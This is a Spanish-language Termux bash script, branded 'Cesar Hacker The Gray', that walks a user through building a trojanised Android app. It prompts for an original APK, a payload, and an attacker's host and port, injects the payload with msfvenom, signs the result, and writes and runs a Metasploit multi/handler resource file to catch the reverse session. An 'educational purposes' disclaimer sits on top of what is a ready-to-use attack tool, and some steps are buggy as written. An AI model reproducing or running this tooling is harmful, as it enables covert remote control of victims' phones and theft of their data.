#!/data/data/com.termux/files/usr/bin/bash
function ctrl_c () {
                echo "
		"
                printf "$Y [!]$R Hola Soy Cesar Hacker The Gray Grasias por usa mi herramienta$W
                \n"
        }

# VAR
	R='\033[1;31m'
        G='\033[1;32m'
        Y='\033[1;33m'
        B='\033[1;34m'
	M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'
	TMP_DIR=$HOME/Tmux-Bunch
	unsign=$(find $TMP_DIR/unsign -name "output.apk")

function Banner {
	echo $(clear)
	printf "$Y"
	echo "_|_|_|            _|                        _|"
	echo "  _|    _|_|_|          _|_|      _|_|_|  _|_|_|_|    _|_|    _|  _|_|"
	echo "  _|    _|    _|  _|  _|_|_|_|  _|          _|      _|    _|  _|_|"
	echo "  _|    _|    _|  _|  _|        _|          _|      _|    _|  _|"
	echo "_|_|_|  _|    _|  _|    _|_|_|    _|_|_|      _|_|    _|_|    _|"
	echo "                  _|"
	echo "                _|      v1.2.3 Cesar Hack Gray"
	printf "$W
	\n"
}

function Chao_chao {
	echo $(clear)
        echo "
        "
        printf "$G"
	echo "     Buscame En You Tube :: https://youtu.be/QA6GwNA2uEs"
  	echo "          ________"
	echo "         / ______ \ "
	echo "         || _  _ || "
	echo "         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK "
	echo "         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK  "
	echo "         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK   "
	echo "         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK  "
	echo "         |||_||_|||         AAA  AAA  PPP       KKK  KKK "
	echo "         ||______||         AAA  AAA  PPP       KKK  KKK"
	echo "        /__________\ "
	echo "________|__________|________________________________________________"
	echo "       /____________\ "
	echo "       |____________|     Cesar Hacker The Gray     (v .1.0.3)"
	echo "======================================================================"
	printf "$Y"
	echo "       (1)   Buscame en las redes sosiales como:"
	echo "       (3)   Nombre : Cesar Hackeando desde android"
	echo "       (4)   Youtube: https://youtu.be/QA6GwNA2uEs"
	echo "       (5)   Instagram: @The Crater viruz gray"
	echo "       (6)   Facebook: Cesar Hack Gray"
	printf "$W"
        echo "
        "
}

function SET {
	Banner
printf "$C [Cesar]$R Bamos a crear nuestro payload$W
	\n"
	sleep 2

printf "$C [Set]$Y Ruta de la apk$C"
	while read -p " >> " APK && [ -z $APK ]; do
		printf "\n $R
		[Gray] porfavor elije una apk original
		$W \n"
	done
			if [ ! -e $APK ]; then
				printf "$R [Gray error tu apk no existe
				$W \n"
				sleep 2
				SET
			fi

printf "$C [Set]$R PAYLOAD$Y"
	while read -p " >> " PAYLOAD && [ -z $PAYLOAD ]; do
		printf "\n $R
		[Gra] porfavor pon el tipo de Payload
		$W \n"
	done

printf "$C [Set]$R LOCAL HOST$Y"
        while read -p " >> " LHOST && [ -z $LHOST ]; do
                printf "\n $R
                [Gray] porfavor pon un IP [HOST]
                $W \n"
	done

printf "$C [Set]$R LOCAL PORT$Y"
        while read -p " >> " LPORT && [ -z $LPORT ]; do
                printf "\n $R
                [Gray] porfavor pon un puerto [LPORT]
                $W \n"
        done

printf "$C [Set]$Y Nuevo nombre $C"
	while read -p " >> " MYAPK && [ -z $MYAPK ]; do
		printf "\n $R
		[Gray] nesesitamos un nuevo nombre de la apk
		$W \n"
	done
sleep 1
	Check
}
function Check {
	Banner
	printf "$C [Cesar]$B Todo esta en orden..?
	"
	sleep 1
printf "$C [!]$Y Original.apk   =$G $APK \n"
printf "$C	 [!]$Y PAYLOAD =$G $PAYLOAD \n"
printf "$C	 [!]$Y LHOST   =$G $LHOST \n"
printf "$C	 [!]$Y LPORT   =$G $LPORT \n"
printf "$C	 [!]$Y YourApk =$G $MYAPK \n"
echo 
printf "$C"
	while read -p "[y | n] >> " yesorno && [ -z $yesorno ]; do
		printf "\n $R
		[Gray] porfavor nesesitamos una respuesta
		$W \n"
	done
		if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
			Payload
		else
			SET
		fi
}
function Payload {
	Banner
	printf "$C [Gray]$G Creating Payload >> Injecting >>$R Original. . .$Y
	"
	msfvenom -x $APK -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT
	sleep 2
        sign
}
function sign {
	Banner
	printf "$C [Gray]$G Como quieres firmar tu apk?
	\n"
	printf "$C [1]$Y Jarsigner \n"
	printf "$C [2]$Y Apksigner$W
	\n"
	while read -p "(1/2) >> " SIGN && [ -z $SIGN ]; do
		printf "$R
		[W] Please, choose an option
		\n $W"
	done
	
	if [ $SIGN -eq '1' ]; then
		echo
		printf "$C [Gray]$G Signing la apk se esta firmando. . .$W \n"
                sleep 3
#sh $TMP_DIR/.signapk publickey.x509.pem publickey.pk8 $TMP_DIR/unsign/$output.apk $TMP_DIR/finished/$MYAPK 
                rm $TMP_DIR/unsign/output.apk
		cd $HOME
		echo
		printf "$G \n \t Listoo!!
		$W"
		sleep 1
		Ending
	elif [ $SIGN -eq '2' ]; then
		printf "$C [Gray]$G Signing la apk se esta firmando. . .$W \n"
		cd $TMP_DIR/unsign
		sleep 3
		apksigner -p Cesar keystore output.apk $TMP_DIR/finished/$MYAPK
		mkdir -p /sdcard/Ruta
		cp $TMP_DIR/finished/$MYAPK /sdcard/Ruta
		rm output.apk
		cd $HOME
		printf "$G \n \t Listoo!!
		$W"
		sleep 1
		Ending
	else
			sign
	fi
}
function Set_Handler {
	Banner
	printf "$C \n [Set]$G LOCAL HOST$W"
		while read -p " >> " LHOST && [ -z $LHOST ]; do
			printf "\n $R
			[Gray] porfavor coloca un IP
			$W \n"
		done
	printf "$C [Set]$G LOCAL PORT$W"
		while read -p " >> " LPORT && [ -z $LPORT ]; do
			printf "\n $R
			[Gra] porfavor coloca un puerto
			$W \n"
		done
	Banner
	printf "$C [Cesar]$G Todo esta bien?
	"
        sleep 1
        printf "$Y [!]$G PAYLOAD =$G $PAYLOAD \n"
	printf "$Y         [!]$C LHOST   =$R $LHOST \n"
	printf "$Y         [!]$C LPORT   =$R $LPORT \n"
	echo
		while read -p "[y | n] >> " yesorno && [ -z $yesorno ]; do
			printf "\n $R
			[Gray] porfavor nesesitamos una respuesta
			$W \n"
		done
			if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
				Msfconsole
			else
				Set_Handler
			fi
}
function Msfconsole {
	Chao_chao
	echo
	printf "$C [Gray]$R explotando.... $Y msfconsole . . .$W"
	echo
	touch $TMP_DIR/Cesar/$MYAPK.rc
	echo "use exploit/multi/handler" >> $TMP_DIR/Cesar/$MYAPK.rc
	echo "set PAYLOAD $PAYLOAD" >> $TMP_DIR/Cesar/$MYAPK.rc
	echo "set LHOST $LHOST" >> $TMP_DIR/Cesar/$MYAPK.rc
	echo "set LPORT $LPORT" >> $TMP_DIR/Cesar/$MYAPK.rc
	echo "run" >> $TMP_DIR/Cesar/$MYAPK.rc
	chmod 777 $TMP_DIR/Cesar/$MYAPK.rc
	echo "
	"
	msfconsole -q -r $TMP_DIR/Cesar/$MYAPK.rc
}
function Ending {
	printf "$C \n
[Gray]$G Quieres enpezar el proseso de metasploit?$W
	\n"
        while read -p "(y|Y/n|N) >> " yesorno && [ -z $yesorno ]; do
                printf "\n $R
                [Gray] porfavor nesesitamos una respuesta
                $W \n"
        done
                if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
                        Banner
                        printf "$R [Gray]$C Quieres usar la comfigurasion de antes ?$W
                        \n"
                        while read -p "[y | n] >> " yesorno && [ -z $yesorno ]; do
                                printf "$R
                                [Gray] porfavor nesesitamos una respuesta
                                $W \n"
                        done
                        if [ $yesorno = 'y' -o $yesorno = 'Y' ] ; then
                                Msfconsole
                        else
                                Set_Handler
                        fi
                else
                        Chao_chao
                        printf "$C [Cesar]$Y Grasias por usar mi herramienta$W
                        \n"
                        printf "$C [Cesar]$Y att.. $B Cesar Hacker THe Gray
                $W \n"
        fi
}

echo $(clear)
        printf "$C"
	echo "                         SOMOS UNO SOMOS TODOS"
	echo "                         HACKEANDO DESDE TERMUX"
        echo "  "                         
        printf "$G"  
printf "$Y"
	echo "              ____                       _   _            _"
	echo "            / ___|___  ___  __ _ _ __  | | | | __ _  ___| | __"
	echo "           | |   / _ \/ __|/ _  |  __| | |_| |/ _  |/ __| |/ /"
	echo "           | |__|  __/\__ \ (_| | |    |  _  | (_| | (__|   < "
	echo "            \____\___||___/\__,_|_|    |_| |_|\__,_|\___|_|\_\"
        "
printf ""$C""
        echo ""            
       	echo "                      AAAAAA   PPPPPPP   KKK  KKK"
      	echo "                     AAA  AAA  PPP  PPP  KKK KKK"
	echo "                     AAA  AAA  PPP  PPP  KKKKKK "
       	echo "                     AAAAAAAA  PPPPPPPP  KKK KKKk"
	echo "                     AAA  AAA  PPP       KKK  KKK"
       	echo "                     AAA  AAA  PPP       KKK  KKK"
        
        echo ""                         
        echo "  
        "
printf "$R"
        echo "                            ADVERTENSIA"
printf "$Y"
        echo "                   ESTE ES UN PROGRAMA HECHO CON"
        echo "                  FINES EDUCATIVOZ HE IMFORMATIVOZ"
        echo "                   por ello no me ago responsable"
	echo "                 del mal uso que le puedas brindarle"
        echo "                        Inyecta apks lejitimas"
        echo "                        CESAR HACKER THE GRAY"
        
printf "$R                         Usalo con precausion "
        echo""
        echo""
        printf "                  $C Presiona$Y en $B enter$C para continuar$W"
        read enter
	SET
        echo "

        "
#					@Cesar.
